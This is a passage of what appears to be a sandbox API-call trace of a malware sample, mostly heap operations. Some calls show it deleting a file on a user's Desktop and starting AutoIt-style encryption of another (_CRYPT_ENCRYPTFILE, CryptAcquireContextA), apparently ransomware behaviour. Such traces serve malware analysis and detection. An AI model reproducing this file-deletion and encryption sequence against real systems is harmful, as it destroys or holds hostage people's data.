lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0126.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0126.956] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0126.956] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif", lpFilePart=0x0) returned 0x2f [0126.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359860 [0126.957] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\v_vfupg6jy sjdteia3.gif")) returned 0x20 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0126.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0126.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0126.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0126.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0126.958] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700cfec0, ftCreationTime.dwHighDateTime=0x1d5ef11, ftLastAccessTime.dwLowDateTime=0xb0963b40, ftLastAccessTime.dwHighDateTime=0x1d5f016, ftLastWriteTime.dwLowDateTime=0xb0963b40, ftLastWriteTime.dwHighDateTime=0x1d5f016, nFileSizeHigh=0x0, nFileSizeLow=0xa4a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="V_VfUPg6JY sjdteIA3.gif", cAlternateFileName="V_VFUP~1.GIF")) returned 0x41ac640 [0126.958] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\v_vfupg6jy sjdteia3.gif")) returned 1 [0127.097] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700cfec0, ftCreationTime.dwHighDateTime=0x1d5ef11, ftLastAccessTime.dwLowDateTime=0xb0963b40, ftLastAccessTime.dwHighDateTime=0x1d5f016, ftLastWriteTime.dwLowDateTime=0xb0963b40, ftLastWriteTime.dwHighDateTime=0x1d5f016, nFileSizeHigh=0x0, nFileSizeLow=0xa4a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="V_VfUPg6JY sjdteIA3.gif", cAlternateFileName="V_VFUP~1.GIF")) returned 0 [0127.097] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359860 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0127.098] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0127.098] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0127.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0127.099] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0127.099] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0127.099] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0127.100] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726794b0, ftCreationTime.dwHighDateTime=0x1d5eaec, ftLastAccessTime.dwLowDateTime=0x835e97a0, ftLastAccessTime.dwHighDateTime=0x1d5f0e1, ftLastWriteTime.dwLowDateTime=0x835e97a0, ftLastWriteTime.dwHighDateTime=0x1d5f0e1, nFileSizeHigh=0x0, nFileSizeLow=0xdae9, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="WMWtJGFcI6Q-91k75WQc.wav", cAlternateFileName="WMWTJG~1.WAV")) returned 0x41ac200 [0127.100] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0127.100] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0127.100] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0127.100] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0127.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0127.101] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wmwtjgfci6q-91k75wqc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0127.101] FreeLibrary (hLibModule=0x772d0000) returned 1 [0127.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0127.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0127.101] CloseHandle (hObject=0x258) returned 1 [0127.101] FreeLibrary (hLibModule=0x772d0000) returned 1 [0127.102] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0127.102] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726794b0, ftCreationTime.dwHighDateTime=0x1d5eaec, ftLastAccessTime.dwLowDateTime=0x835e97a0, ftLastAccessTime.dwHighDateTime=0x1d5f0e1, ftLastWriteTime.dwLowDateTime=0x835e97a0, ftLastWriteTime.dwHighDateTime=0x1d5f0e1, nFileSizeHigh=0x0, nFileSizeLow=0xdae9, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="WMWtJGFcI6Q-91k75WQc.wav", cAlternateFileName="WMWTJG~1.WAV")) returned 0x41ac140 [0127.102] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0127.102] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0127.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0127.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0127.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0127.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0127.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0127.103] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 